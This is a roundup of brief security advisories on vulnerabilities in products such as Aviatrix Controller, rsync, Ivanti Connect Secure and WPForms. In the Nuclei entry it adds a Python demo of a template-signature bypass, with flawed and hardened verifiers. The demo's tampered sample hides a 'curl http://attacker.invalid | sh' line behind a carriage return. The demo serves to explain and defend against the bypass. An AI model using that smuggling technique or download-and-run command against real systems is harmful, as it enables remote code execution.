A critical command injection vulnerability, CVE-2024-50603, in the Aviatrix Controller allows unauthenticated remote attackers to execute arbitrary code. The flaw, rated CVSS 10.0, stems from improper input handling in the Aviatrix Controller's API. Exploitation could lead to full system compromise, data theft, and network breaches. Hundreds of Aviatrix Controllers are exposed to the internet and can be found with the Shodan search engine.
A severe vulnerability in the W3 Total Cache plugin for WordPress has been identified, impacting over one million websites. This flaw lets an attacker gain unauthorized access to sensitive data, including instance metadata of cloud-based apps. Because it is exploitable by any authenticated user with Subscriber-level privileges, the vulnerability poses a substantial risk to WordPress sites using the plugin, potentially exposing user data and compromising site security.
Multiple vulnerabilities have been discovered in rsync, a widely used file transfer program. Six vulnerabilities have been identified, including a critical heap-based buffer overflow (CVE-2024-12084) that allows attackers with only anonymous read access to an rsync server to execute arbitrary code on the machine. Other vulnerabilities include information leaks and symlink issues. Users are advised to upgrade to rsync version 3.4.0, released on January 14th, to patch these issues. This highlights the importance of timely patching of critical network utilities.
Multiple critical vulnerabilities have been discovered in SimpleHelp remote support software. These flaws include unauthorized file access, privilege escalation, and remote code execution. These vulnerabilities are trivial to exploit, making them a serious risk for both SimpleHelp servers and the client machines that the software is used to manage. Patches are available, and users are advised to upgrade immediately.
Microsoft has analyzed CVE-2024-44243, a macOS vulnerability that allows attackers who already have root privileges to bypass System Integrity Protection (SIP) by loading third-party kernel extensions, abusing the entitlements of the Storage Kit daemon (storagekitd). This can lead to the installation of rootkits, creation of persistent malware, and circumvention of Transparency, Consent, and Control (TCC) mechanisms, enabling further unauthorized operations on affected systems. The discovery underscores the importance of robust security measures across all platforms and the impact that vulnerabilities in kernel extensions can have. It also shows that Microsoft is actively involved in securing non-Windows platforms.
A critical zero-day vulnerability, tracked as CVE-2025-0282, has been discovered in Ivanti Connect Secure, Policy Secure, and Neurons for ZTA gateways. This stack-based buffer overflow allows unauthenticated remote attackers to achieve remote code execution. It was disclosed alongside CVE-2025-0283, another stack-based buffer overflow, which lets a local authenticated attacker escalate privileges. CVE-2025-0282 is being actively exploited in the wild. Organizations are advised to apply the available patches immediately and perform factory resets to ensure complete removal of any malware that may have been deployed. Ivanti products have a long history of being targeted by attackers.
Multiple vulnerabilities have been discovered in Palo Alto Networks’ Expedition migration tool, including an OS command injection flaw and a vulnerability that exposes sensitive firewall credentials. These vulnerabilities could allow attackers to execute arbitrary code and access usernames, cleartext passwords, device configurations, and API keys. The vulnerabilities pose a significant risk to organizations using the tool for firewall migration and optimization.
Critical security vulnerabilities have been found in the Fancy Product Designer plugin for WordPress. These unpatched flaws allow attackers to compromise the hosting system, expose data, and disrupt service. The plugin, with over 20,000 sales, is now a major security risk for the WordPress websites that use it. Site owners must take immediate action to mitigate these vulnerabilities, which highlights the need for thorough security practices on WordPress.
Moxa has identified two serious security vulnerabilities in its cellular routers, secure routers, and network security appliances. The first, CVE-2024-9138, involves hard-coded credentials that could allow authenticated users to escalate their privileges to root-level access, enabling system compromise, unauthorized modifications, data exposure, and service disruptions. The second, CVE-2024-9140, is an OS command injection flaw caused by insufficient input restrictions that could allow attackers to execute arbitrary commands on the device. Moxa rates CVE-2024-9140 critical (CVSS 9.3) and CVE-2024-9138 high (CVSS 8.6), and is urging users to apply updates immediately to mitigate these risks.
A high-severity code execution vulnerability has been found in the Nuclei vulnerability scanner due to a bypass of its template signature verification. The verifier locates and strips the signature line with a regular expression that only recognizes \n as a line terminator, whereas the YAML parser also treats \r as a line break. An attacker can therefore hide extra template content behind a \r on a signature line: the verifier excludes it from the signed content, but the parser executes it. This allows malicious code to be injected via custom templates, potentially compromising systems that run Nuclei. It highlights the risks of accepting custom templates in security tools and the need for verification logic that sees exactly what the parser sees.
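The parser differential described above, reconstructed as an added example; this is not Nuclei's code. The `# digest:` trailer, the HMAC-based signing scheme and the key are simplifications chosen for the demo (the real project uses asymmetric signatures), and the tiny `key: value` loader stands in for a YAML parser, mimicking only its treatment of `\r` as a line break. The hardened variant normalizes line endings before verifying and insists on a single, well-formed trailer as the last line, so the verifier hashes exactly the text the loader will parse.

```python
"""Parser-differential demo: regex-based signature check vs. a YAML-style loader.

Added example, not Nuclei's code. The trailer format and HMAC scheme are
simplifications; the line-boundary mismatch is the point being demonstrated.
"""
import hashlib
import hmac
import re
from typing import Optional

# Hypothetical demo key; stands in for the project's real signing key.
SIGNING_KEY = b"demo-signing-key"

# In MULTILINE mode '^' and '$' only recognise '\n' as a line boundary, and
# '.' matches '\r', so a '\r' and everything after it on that line are treated
# as part of the digest comment. The optional '\n?' eats the line's newline.
DIGEST_RE = re.compile(r"^# digest: (.+)$\n?", re.MULTILINE)


def _mac(content: str) -> str:
    return hmac.new(SIGNING_KEY, content.encode(), hashlib.sha256).hexdigest()


def sign_template(body: str) -> str:
    """Append a '# digest:' trailer covering the body (old trailers dropped)."""
    body = DIGEST_RE.sub("", body)
    if not body.endswith("\n"):
        body += "\n"
    return body + "# digest: " + _mac(body) + "\n"


def verify_flawed(template: str) -> bool:
    """Flawed pattern: take the first digest line as the signature, strip every
    regex-matched digest line, and MAC whatever is left."""
    m = DIGEST_RE.search(template)
    if m is None:
        return False
    content = DIGEST_RE.sub("", template)
    return hmac.compare_digest(m.group(1).encode(), _mac(content).encode())


def load_template(template: str) -> dict:
    """Minimal 'key: value' loader. Like a YAML scanner it treats '\r' as a
    line break, so it sees lines the regex above folded into a comment."""
    fields = {}
    for line in re.split(r"\r\n|\r|\n", template):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def normalise(template: str) -> str:
    """Canonicalise line endings so verifier and loader agree on line boundaries."""
    return template.replace("\r\n", "\n").replace("\r", "\n")


def verify_hardened(template: str) -> bool:
    """Verify exactly the text the loader will see: normalise first, then
    require one well-formed digest trailer and that it is the last line."""
    template = normalise(template)
    digests = DIGEST_RE.findall(template)
    if len(digests) != 1 or not re.fullmatch(r"[0-9a-f]{64}", digests[0]):
        return False
    lines = template.splitlines()
    if not lines or not lines[-1].startswith("# digest: "):
        return False
    content = DIGEST_RE.sub("", template)
    return hmac.compare_digest(digests[0].encode(), _mac(content).encode())


def load_hardened(template: str) -> Optional[dict]:
    """Only hand normalised, verified text to the loader."""
    template = normalise(template)
    if not verify_hardened(template):
        return None
    return load_template(template)


# Constructed sample input: a benign signed template, then an attacker's copy
# that hides an extra field behind a '\r' inside a bogus second digest line.
BENIGN = "id: http-title\nseverity: info\n"
SIGNED = sign_template(BENIGN)
TAMPERED = SIGNED + "# digest: junk\rcommand: curl http://attacker.invalid | sh\n"


def demo() -> dict:
    """Flawed verifier accepts the tampered file, whose loader output gains an
    attacker-controlled 'command' field; the hardened verifier rejects it."""
    return {
        "signed_ok_flawed": verify_flawed(SIGNED),
        "tampered_ok_flawed": verify_flawed(TAMPERED),
        "tampered_fields_flawed": load_template(TAMPERED),
        "tampered_ok_hardened": verify_hardened(TAMPERED),
        "signed_ok_hardened": verify_hardened(SIGNED),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The general lesson is not specific to `\r`: whenever a signature check and the consumer of the signed bytes tokenize the input differently (line endings, comment syntax, encodings, duplicate keys), the attacker gets to choose which side sees what. Verify the canonical form that the parser will actually consume, or better, verify the raw bytes and parse only after the check passes.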
Tenable has disabled two Nessus Agent versions (10.8.0 and 10.8.1) after discovering that a faulty differential plugin update was causing agents to go offline. The issue prevents affected agents from scanning for vulnerabilities and collecting security data. Tenable has released version 10.8.2 to fix the problem and has published instructions for bringing affected agents back online. This is a critical update for all users of the Tenable Nessus Agent.
A critical vulnerability, identified as CVE-2024-8474, exists in OpenVPN Connect prior to version 3.5.0. The application wrote users' private keys in clear text to its logs. An attacker with access to those logs obtains the key and can impersonate the user's VPN client or otherwise undermine the confidentiality of their VPN connection. Separately, CVE-2024-5594 in OpenVPN before 2.6.11 allows a malicious peer to inject arbitrary data through improperly sanitized PUSH_REPLY messages, which could be used to attack third-party plugins or executables that consume those values. Both vulnerabilities pose serious risks to OpenVPN users.
A critical vulnerability, CVE-2024-11205, has been discovered in the WPForms plugin for WordPress, affecting versions 1.8.4 through 1.9.2.1. It stems from a missing authorization check in the wpforms_is_admin_page function, allowing attackers with Subscriber-level privileges to perform unauthorized actions such as refunding payments and canceling subscriptions. This can cause significant financial losses and service disruptions for website owners using the plugin. A fix is available in version 1.9.2.2 or later. Website administrators should update, review user permissions, enable 2FA, monitor site activity, and back up regularly to mitigate risks. This vulnerability highlights the importance of proactive security measures and staying informed about software updates.